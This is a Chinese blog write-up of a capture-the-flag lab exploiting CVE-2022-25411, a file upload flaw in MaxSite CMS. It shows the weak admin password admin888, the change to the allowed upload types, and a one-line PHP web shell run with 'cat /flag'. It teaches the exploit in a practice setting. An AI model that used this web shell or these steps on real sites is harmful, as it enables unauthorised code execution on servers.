春秋云境:CVE-2022-25411(Maxsite CMS文件上传漏洞)

最新推荐文章于 2024-07-18 20:16:55 发布
最新推荐文章于 2024-07-18 20:16:55 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: i春秋 文章标签: 安全 web安全 开发语言 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/130301013
版权
文章详细介绍了MaxSiteCMS内容管理系统存在的文件上传漏洞,攻击者可以利用此漏洞通过特定的PHP文件执行任意代码。文中提到,系统默认的弱口令为admin888,用户可以通过修改文件类型设置来上传PHP木马,并通过执行已上传的PHP文件获取flag。
摘要由CSDN通过智能技术生成

目录

一、题目

 二、官方POC 

一、题目

介绍:

MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统

Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。

进入题目:

发现是俄文  乌拉~~

 不过没关系 我们国产化一下:

 二、官方POC 

国家信息安全漏洞库 

 登录目录是/admin/options

一开始以为弱口令就是admin:admin 

 然而不对:

 尝试了几个密码password admin123 666 888什么的

结果还被试出来了:admin888

先修改可上传文件类型 

 添加php

 进入下载页面:

点击上传页面:

上传木马文件:

<?php system($_GET[1]);phpinfo();?> 

点击下载

点击已上传的文件

查看 xxx.php?1=cat /flag

flag{90aeafa9-7baf-413d-ba1d-7817411d86f0} 

橙子学不会.
关注
专栏目录
MaxSite CMS 代码问题漏洞(CVE-2022-25411)
千寻的博客
12-09 1976
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云境CVE-2022-25411
一只爱吃橙子的羊
12-01 1720
MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队、官方模板团队、官方插件团队。一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、提升网站品质!独立开发的管理员管理系统,可以对管理员进行更能人性化的管理网站。 Maxsite CMS存在文件
MaxSite CMS v180 文件上传漏洞CVE-2022-25411
热门推荐
Flag少侠的博客
07-18 1万+
打开靶场进去一看俄语的网页翻译一下没有找到线索CVE 官网找这个漏洞的详细信息直接访问报错加上 index.php 访问即可打开 BurpSuite 准备爆破这里也加上 index.php 防止 404,然后添加 payload 位置,添加字典开始攻击有一组数据不一样发送到重发模块中发送显示 302,同时给出了四个 Cookie 值选取一个值然后尝试直接访问 /admin/file能访问成功访问设置,一定不能忘记加 index.php 否则 404翻译一下,看到有下载。
春秋云镜 CVE-2022-25411
qq_22002773的博客
07-04 545
春秋云镜 CVE-2022-25578
春秋云镜CVE-2022-25411
风依旧的博客
05-16 408
春秋云镜CVE-2022-25411,通过搜索引擎得到上传文件路径/admin/files,将cookie修改为正确口令得到的cookie,发现能成功进入上传页面。如果出现404,就是数据包中缺失index.php路径,自行添加即可。思路是对的,但是admin/admin888依然返回302,将口令带入重放器中尝试。通过搜索引擎,得到/admin/options为登录页面,尝试进入登录页面。尝试上传图片,上传成功。
CVE-2022-25411
龙狼刺的博客
06-23 415
Maxsite CMS文件上传漏洞MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队、官方模板团队、官方插件团队。一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、提升网站品质!
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境CVE-2022-29464
07-28
综上所述,CVE-2022-29464是一个严重的漏洞,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得远程命令执行权限。 #### 引用[.reference_title] - *1* [【春秋云境CVE-2022-29464]...
春秋云境CVE-2022-23906
08-03
春秋云境中的CVE-2022-23906是指CMS Made Simple v2.2.15存在一个通过上传图片功能的远程命令执行(RCE)漏洞。攻击者可以通过精心制作的图像文件来利用此漏洞。[2]如果你想了解更多关于该漏洞的信息,你可以查看这...
春秋云境CVE-2022-23880
11-29
根据提供的引用内容,春秋云境是一个靶场,其中包含了一个名为taoCMS v3.0.2的文件管理系统,该系统存在任意文件上传漏洞CVE-2022-23880。攻击者可以利用该漏洞上传恶意文件并执行任意代码。如果您想了解更多关于该...
X站H站程序,maxcms,整站打包,带数据。
05-27
X站H站程序,maxcms,整站打包,带数据。主题是根据我自己喜欢的风格做的,如果大家不喜欢,可联系做。
马克斯CMS(maxcms) v4.0 build 20150112.zip
07-05
maxcms2015.01.12更新记录 1、修复吉吉影音在谷歌浏览器中不能显示插件问题; 2、修复整合ckplayer6.6中不能自定义播放参数、分享等问题; 3、其它简单问题!   马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱        相关阅读 同类推荐:站长常用源码
马克斯CMS(maxcms) v2.0 for sqlserver build 090614.rar
08-30
此次马克斯CMS2.0全新架构,速度性能都有极大提升 压缩里的标签文档为开发版文档,详细使用标签文档迟些会整理发出。 安装时默认是选的 站外 ,即不能连播,如果需要连播或是自动播放,请自己选站内。 请在IIS下调试,动态版请指定默认文档为index.asp,动态版是有缓存的,请修改过数据或是模板后在后台清除缓存然后前台看效果。 程序更新历史记录: 2009.06.14**11:51土豆播放器失效修正,/js/play.swf 2009.05.20**18:06增加标签[videolist:playlink],[channellist:playlink],{playpage:nolinkactor};内容也播放页以下标签增加长度控制{playpage:des}{playpage:nolinkactor} {playpage:name};修正后台自定义快捷菜单容错性;更新/admin/admin_makehtml.asp,/admin/admin_selfmenu.asp,/inc/mainclass.asp,commonfun.asp,/content/index.asp,/play/index.asp 2009.05.15**11:51修改sqlserver版的makeDatabase.asp,建空库时插入后台账号信息、便于登陆后台 2009.05.14**2:30发布sqlserver完整包 2009.05.12**22:10改进评论显示,剥离留言本样式与模板的关联,去除部分弹出层改为js的alert、便于用户操作,修正部分服务器上存在的google地图生成错误,更新文件gbook.asp,comment.asp,/js/function.js,/admin/admin_makehtml.asp 2009.05.07**13:31更新GVOD联播及缓冲下集、新浪高清播放器 2009.05.04**18:19更新2009新版资源库**台稳定版 2009.03.27**23:50改进程序易用性,修复图片采集bug,影片介绍为空生成错误解决,新浪高清更换播放器,改进后台添加下载地址等(因此次无必须功能升级,故未在后台更新提示) 2009.03.23**18:13增加影片seo关键字标签{playpage:note},更新文件/inc/CommonFun.asp,/inc/MainClass.asp,/play/index.asp,/content/index.asp,/admin/admin_makehtml.asp 2009.03.20**23:49增加远古高清和ku6的支持,更新文件/js/webplayer2008.html,/js/play.swf,/inc/playerKinds.xml,/admin/images/main.js 2009.03.20凌晨01:15更新自定义播放页是否生成 2009.03.17增加影片某一集名称标签{playpage:part},更新文件/play/index.asp 2009.03.17播放器支持gvod, 更新文件/js/play.swf , /js/gvod.html , /inc/playerKinds.xml , /admin/images/main.js , /admin/images/version.xml 2009.03.16修正新浪专辑采集问题,以及后台采集资源后时间更新问题,修改文件/admin/admin_resourcelib.asp,admin_webgather.asp 2009.03.07修正qvod播放器问题,修改了/js/play.swf,/js/play.js文件解决在IFRAME下播放问题
通王CMS(TWCMS) v2.0.3 20140505
10-24
TWCMS是由中国首家网络营销策划机构通王科技推出,免费开源。是国内首家同时推出:高性能轻量级开源框架(KongPHP框架)、高性能轻量级模板引擎、高性能轻量级开源CMS的公司。是国内首款支持亿级负载的轻量级CMS。是国内首款负载能力远超discuz、phpwind等论坛程序的CMS。TWCMS的特点:1:体积小功能强轻量级网站内容管理系统 TWCMS体积小巧,安装包不到1M,简洁精干,没有冗长的代码,没有华丽的视觉效果,没有不必要的功能,我们注重实用性,主程序只做最核心,最实用的功能,当然,不做不代表不能实现,其它的功能可以通过我们强大的插件来实现。2:速度快性能高TWCMS一直追求程序的速度和性能,程序框架采用懒加载、分布式服务器的设计,每张表都可有自己的DB服务器群和CACHE服务器(群),单表都能承受亿级数据,运行速度快,根据官方测试:TWCMS在亿级数据依然在0.0x秒,而在APC的环境,亿级数据在0.00x秒。3:高安全够稳定我们深知安全对于一款CMS的重要性,TWCMS基于自主研发的开源框架KONGPHP开发安全高效,为进一步保证程序的安全性,我们邀请“乌云漏洞平台”、
马克斯cmsphp,马克斯CMS2.0beta (maxcms)管理员认证绕过漏洞
weixin_42511517的博客
03-26 515
<?phpprint_r('+---------------------------------------------------------------------------+maxcms2.0 creat new admin exploitby Flyh4tteam:wolvez security teamsite:bbs.wolvez.orgdork:salemax#qq.com+...
春秋云境CVE-2022-25411[漏洞复现]
如有错误感谢斧正
06-25 322
尝试admin、123456、admin666、admin123、admin888...等等常见弱口令。进入设置栏目的第一个选项:(这里我把翻译插件从火山换成了腾讯,感觉翻译上都有点问题)通过bp可以看到直接爆破的话会出302重定向响应码,这里可以通过看响应包的长度。在这里可以看到后台管理的登录地址:/admin/,根据题目提示可知是弱口令。往下拉,找到“允许下载的文件类型 ”并在后面加上php,点击保存。PS:有好用的不用挂梯子的翻译插件可以推荐一下给我。在此上传页中,选择我们的木马文件进行上传。
CVE-2022-25411,MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。
qq_42036164的博客
01-09 244
MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。
春秋云镜CVE-2022-24112
最新发布
08-21
春秋云镜的CVE-2022-24112是一个安全漏洞的编号,全称为“Cross-Site Scripting (XSS)”,它通常发生在网站存在输入验证不足的情况下。攻击者通过恶意脚本注入到用户的请求中,当这些脚本被服务器作为有效内容返回给用户浏览器时,就会触发XSS攻击。这种漏洞可能导致未经授权的信息泄露、会话劫持或者对用户界面的控制权转移。为了修复这个漏洞春秋云镜团队需要强化输入验证,防止恶意脚本被执行,并及时发布安全更新以保护用户的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值